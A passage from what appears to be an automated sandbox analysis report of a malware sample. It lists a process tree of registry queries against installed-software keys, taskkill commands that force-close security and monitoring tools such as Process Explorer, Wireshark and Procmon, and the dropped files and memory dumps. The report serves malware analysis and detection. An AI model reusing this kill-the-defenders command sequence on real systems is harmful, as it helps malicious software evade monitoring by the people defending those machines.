                                                                                                                                                                                                                                                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:2272
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                            cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:2700
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1464
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2640
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1400
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2712
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2652
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1992
                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2672
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2484
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1124
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2032
                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2068
                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1436
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1868
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:340
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1308
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2784
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2764
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2688
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2768
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2812
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                      cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2888
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2816
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2912
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                            cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2868
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2524
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2808
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:916
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2928
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2976
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2992
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:764
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3012
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2120
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2076
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2200
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2196
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2292
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2564
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2836
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2348
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2540
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1932
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2988
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1012
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2416
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2136
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:3024

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Network

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      MITRE ATT&CK Enterprise v6

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Replay Monitor

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Downloads

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\.ntusernt.ini

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\bTTIR\Desktop.ini

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\bTTIR\SOAqQ.class

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • \Users\Admin\AppData\Local\Temp\KADMOemKkk2699470586759993488.xml

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/268-200-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/272-30-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/324-36-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/340-259-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/380-230-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/392-196-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/392-31-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/428-199-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/512-33-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/512-184-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/520-8-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/544-97-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/544-11-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/568-181-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/588-103-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/588-32-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/608-22-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/644-236-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/672-101-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/724-15-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/764-276-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/764-14-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/800-35-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/832-197-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/832-94-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/856-231-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/856-107-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/884-151-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/884-21-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/916-272-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/916-19-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/1012-289-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/1016-100-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/1052-104-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/1052-29-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/1056-235-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/1080-210-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/1112-84-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/1124-23-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/1124-254-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/1140-41-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/1252-83-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/1276-12-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/1284-211-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/1308-260-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/1312-6-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/1372-170-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/1388-224-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/1400-248-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/1412-152-0x0000000002710000-0x0000000002711000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/1412-129-0x00000000028C0000-0x00000000028C1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/1412-82-0x00000000023C0000-0x00000000023C1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/1412-150-0x0000000002700000-0x0000000002701000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/1412-124-0x00000000026D0000-0x00000000026D1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/1412-72-0x000000001ACC0000-0x000000001ACC1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/1412-71-0x00000000022F0000-0x00000000022F1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/1412-95-0x0000000002480000-0x0000000002481000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/1412-18-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/1412-34-0x000007FEF5F10000-0x000007FEF68FC000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        9.9MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/1436-257-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/1464-246-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/1468-39-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/1496-16-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/1496-234-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/1496-42-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/1504-102-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/1504-206-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/1512-145-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/1540-193-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/1544-126-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/1544-40-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/1608-20-0x0000000000000000-mapping.dmp

